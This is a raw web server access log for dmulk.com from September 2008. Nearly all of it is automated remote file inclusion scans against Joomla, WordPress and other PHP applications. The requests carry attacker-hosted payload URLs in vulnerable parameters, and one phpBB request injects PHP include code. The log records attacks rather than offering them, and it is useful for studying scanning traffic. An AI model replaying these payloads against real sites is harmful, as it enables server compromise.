65.55.108.195 - - [12/Sep/2008:10:03:57 -0700] "GET /tmp/sess_c71bc67bd15c3162bd16e1ac8afba60e HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:04:00 -0700] "GET /logs/access_080525.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:04:09 -0700] "GET /logs/access_080619.log/interna.php?meio=http://www.elux.com.br/help/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:04:09 -0700] "GET /interna.php?meio=http://www.elux.com.br/help/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:04:09 -0700] "GET /logs/interna.php?meio=http://www.elux.com.br/help/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:04:10 -0700] "GET /logs/access_080708.log/interna.php?meio=http://www.elux.com.br/help/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:04:19 -0700] "GET /logs/access_080619.log/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:04:20 -0700] "GET /interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:04:20 -0700] "GET /logs/access_080708.log/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:04:20 -0700] "GET /logs/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:21 -0700] "GET /logs/access_080711.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:21 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:21 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:21 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:10:04:31 -0700] "GET /show.php?page=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:35 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:35 -0700] "GET /logs/access_080711.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:35 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:04:35 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.251.10.157 - - [12/Sep/2008:10:04:44 -0700] "GET /logs/access.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xscan.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.251.10.157 - - [12/Sep/2008:10:04:45 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xscan.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:04:49 -0700] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:04:50 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:04:50 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:05:01 -0700] "GET /interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:05:01 -0700] "GET /logs/access_080619.log/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:05:01 -0700] "GET /logs/access_080708.log/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:05:01 -0700] "GET /logs/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.8.125 - - [12/Sep/2008:10:05:30 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
64.251.10.157 - - [12/Sep/2008:10:05:35 -0700] "GET /logs/access_080822.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xscan.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:05:45 -0700] "GET /logs/access_080524.log%20/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:05:46 -0700] "GET /logs/access_080524.log%20/interna.php?meio=http://www.elux.com.br/help/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:05:50 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:05:51 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:05:51 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:10:05:58 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:06:07 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:06:07 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:06:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:10:06:13 -0700] "GET /logs/access_080331.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:06:19 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:06:19 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:06:19 -0700] "GET //admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:06:19 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:06:20 -0700] "GET /logs//admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:06:20 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:06:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:06:35 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:06:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:06:36 -0700] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:06:40 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.63.210 - - [12/Sep/2008:10:06:41 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.63.210 - - [12/Sep/2008:10:06:41 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.63.210 - - [12/Sep/2008:10:06:42 -0700] "GET /logs/access_080216.log//admin/frontpage_right.php?loadadminpage=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.13 - - [12/Sep/2008:10:06:45 -0700] "GET /logs/access_080522.log/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.13 - - [12/Sep/2008:10:06:46 -0700] "GET /errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.13 - - [12/Sep/2008:10:06:46 -0700] "GET /logs/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:06:53 -0700] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:06:53 -0700] "GET /logs/access_080616.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:07:00 -0700] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:07:00 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:10:07:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:10:07:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:07:03 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:10:07:05 -0700] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:10:07:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:10:07:05 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:10:07:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:07:13 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:07:13 -0700] "GET /logs/access_071202.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:07:13 -0700] "GET ///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:07:15 -0700] "GET /logs/access_080218.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:10:07:19 -0700] "GET /logs/access_080216.log//admin/frontpage_right.php?loadadminpage=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:10:07:19 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:10:07:20 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:07:21 -0700] "GET /logs/access_080417.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:07:23 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:07:29 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:07:31 -0700] "GET /logs/access_080809.log/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:07:31 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:07:32 -0700] "GET /errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:07:32 -0700] "GET /logs/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:07:33 -0700] "GET /logs/access_080315.log/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.13 - - [12/Sep/2008:10:07:44 -0700] "GET /logs/access_080226.log/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:07:57 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:07:58 -0700] "GET /phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.13 - - [12/Sep/2008:10:08:00 -0700] "GET /errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:08:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:08:06 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:08:06 -0700] "GET /logs/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:08:07 -0700] "GET /errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:10:08:08 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:10:08:08 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:10:08:28 -0700] "GET /logs/access_080801.log//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:10:08:28 -0700] "GET //include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:10:08:28 -0700] "GET /logs//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:10:08:29 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:10:08:31 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 200 89464 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.114.175 - - [12/Sep/2008:10:08:42 -0700] "GET /index.php?option=com_user&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89424 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:10:08:43 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:08:51 -0700] "GET /logs/access_080510.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:08:52 -0700] "GET /logs/access_080820.log//dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:08:52 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:08:53 -0700] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:08:53 -0700] "GET /logs/access_080820.log//dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:08:53 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:08:54 -0700] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:08:56 -0700] "GET /logs/access_080524.log%20/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:09:02 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:09:03 -0700] "GET /phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:09:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:09:13 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:09:13 -0700] "GET /logs/access_080106.log//claroline/phpbb/page_tail.php?includePath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:09:13 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:09:13 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:09:24 -0700] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:09:30 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:09:31 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:09:31 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
